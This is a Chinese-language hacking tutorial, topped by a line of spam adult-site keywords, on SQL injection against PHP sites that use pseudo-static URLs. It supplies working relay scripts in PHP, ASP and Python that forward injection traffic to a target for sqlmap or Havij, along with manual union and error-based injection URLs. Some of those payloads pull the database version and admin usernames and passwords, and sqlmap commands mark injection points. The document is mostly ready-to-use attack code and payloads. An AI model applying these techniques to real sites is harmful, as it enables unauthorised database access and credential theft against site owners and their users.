久久99精品久久,日本中文字幕在线,久草免费新视频

本文實例講述了PHP針對偽靜態的注入。分享給大家供大家參考，具體如下：

一：中轉注入法

1.通過http://www.xxx.com/news.php?id=1做了偽靜態之后就成這樣了
http://www.xxx.com/news.php/id/1.html

2.測試步驟：

中轉注入的php代碼:inject.php

				?

									<?php

									set_time_limit(0);

									$id=$_GET["id"];

									$id=str_replace(” “,”%20″,$id);

									$id=str_replace(“=”,”%3D”,$id);

									//$url = "http://www.xxx.com/news.php/id/$id.html";

									$url = "http://www.xxx.com/news.php/id/$id.html";

									//echo $url;

									$ch = curl_init();

									curl_setopt($ch, CURLOPT_URL, "$url");

									curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

									curl_setopt($ch, CURLOPT_HEADER, 0);

									$output = curl_exec($ch);

									curl_close($ch);

									print_r($output);

									?>

3.本地環境搭建PHP，然后訪問http://127.0.0.1/inject.php?id=1

通過sqlmap或者havj可以跑注入漏洞。

附錄ASP中轉代碼：

				?

									<%

									JmdcwName=request("id")

									JmStr=JmdcwName

									JmStr=URLEncoding(JmStr)

									JMUrl="http://192.168.235.7:8808/ad/blog/"&nbsp;&nbsp;//實際上要請求的網址

									JMUrl=JMUrl & JmStr&".html"&nbsp; &nbsp; //拼接url

									response.write JMUrl&JmStr&nbsp; &nbsp; //我這里故意輸出url來看

									'JmRef="http://127.0.0.1/6kbbs/bank.asp"

									JmCok=""

									JmCok=replace(JmCok,chr(32),"%20") 

									JmStr=URLEncoding(JmStr)&nbsp;&nbsp;

									response.write&nbsp;&nbsp;PostData(JMUrl,JmStr,JmCok,JmRef) //url,查詢字符串，cookie，referer字段

									Function PostData(PostUrl,PostStr,PostCok,PostRef)&nbsp;&nbsp;

									Dim Http

									Set Http = Server.CreateObject("msxml2.serverXMLHTTP")

									With Http

									.Open "GET",PostUrl,False

									.Send ()

									PostData = .ResponseBody

									End With

									Set Http = Nothing

									PostData =bytes2BSTR(PostData)

									End Function

									Function bytes2BSTR(vIn)&nbsp; &nbsp;//處理返回的信息

									Dim strReturn

									Dim I, ThisCharCode, NextCharCode

									strReturn = ""

									For I = 1 To LenB(vIn)

									ThisCharCode = AscB(MidB(vIn, I, 1))

									If ThisCharCode < &H80 Then

									strReturn = strReturn & Chr(ThisCharCode)

									Else

									NextCharCode = AscB(MidB(vIn, I + 1, 1))

									strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))

									I = I + 1

									End If

									Next

									bytes2BSTR = strReturn

									End Function

									Function URLEncoding(vstrin)&nbsp; &nbsp; //發包前對參數的url編碼一下

									strReturn=""

									Dim i

									'vstrin=replace(vstrin,"%","%25") '增加轉換搜索字符,

									'vstrin=Replace(vstrin,chr(32),"%20") '轉換空格,如果網站過濾了空格,嘗試用/**/來代替%20

									'vstrin=Replace(vstrin,chr(43),"%2B")&nbsp;&nbsp;'JMDCW增加轉換+字符

									vstrin=Replace(vstrin,chr(32),"/**/")&nbsp;&nbsp;'在此增加要過濾的代碼 //這里很關鍵，方便啊，把空格自動換成/**/，后面會說到的

									For i=1 To Len(vstrin)

									ThisChr=Mid(vstrin,i,1)

									if Abs(Asc(ThisChr))< &HFF Then

									strReturn=strReturn & ThisChr

									Else

									InnerCode=Asc(ThisChr)

									If InnerCode<0 Then

									InnerCode=InnerCode + &H10000

									End If

									Hight1=(InnerCode And &HFF00) \&HFF

									Low1=InnerCode And &HFF

									strReturn=strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1)

									End if

									Next

									URLEncoding=strReturn

									End Function

									%>

二、手工注入法

1.http://www.xxx.com/play/Diablo.html
http://www.xxx.com/down/html/?772.html

2.測試注入：

http://www.xxx.com/down/html/?772′.html
http://www.xxx.com /play/Diablo'.html
http://www.xxx.com/play/Diablo'/**/and
/**/1='1 /*.html
http://www.xxx.com/play/Diablo'
/**/and
/**/1='2 /*.html
http://www.xxx.com/page/html/?56′/**/and/**/1=1/*.html 正常
http://www.xxx.com/page/html/?56′/**/and/**/1=2/*.html 出錯

3.看頁面是否存在差異，相同則不存在，不同存在注入。

4.聯合查詢：

http://www.xxx.com/play/diablo' and 1=2 union select 1,2… frominformation_schema.columns where 1='1.html
http://www.xxx.com/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html

手工注入法（二）

http://www.xxx.net/news/html/?410.html
http://www.xxx.net/news/html/?410'union/**/select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),0x3a,(select/**/concat(user,0x3a,password)/**/from/**/pwn_base_admin/**/limit/**/0,1),0x3a)a/**/from/**/information_schema.tables/**/group/**/by/**/a)b/**/where'1'='1.html

注：

偽靜態的注入和URL的普通GET注入不太相同

。普通url的get注入的%20,%23,+等都可以用；但是偽靜態不行，會被直接傳遞到到url中，所以用/**/這個注釋符號表示空格。

三、SQLmap方法

在sqlmap中偽靜態哪兒存在注入點就加*
http://www.cunlide.com/id1/1/id2/2
python sqlmap.py -u “http://www.xxx.com/id1/1*/id2/2″
http://www.xxx.com/news/class/?103.htm
python sqlmap.py -u “http://www.xxx.com/news/class/?103*.html”

四、python腳本方法

代碼：

				?

									from BaseHTTPServer import *

									import urllib2

									class MyHTTPHandler(BaseHTTPRequestHandler):

									 def do_GET(self):

									  path=self.path

									  path=path[path.find('id=')+3:]

									  proxy_support = urllib2.ProxyHandler({"http":"http://127.0.0.1:8087"})

									  opener = urllib2.build_opener(proxy_support)

									  urllib2.install_opener(opener)

									  url="http://www.xxx.com/magazine/imedia/gallery/dickinsons-last-dance/"

									  try:

									   response=urllib2.urlopen(url+path)

									   html=response.read()

									  except urllib2.URLError,e:

									   html=e.read()

									  self.wfile.write(html)

									server = HTTPServer(("", 8000), MyHTTPHandler)

									server.serve_forever()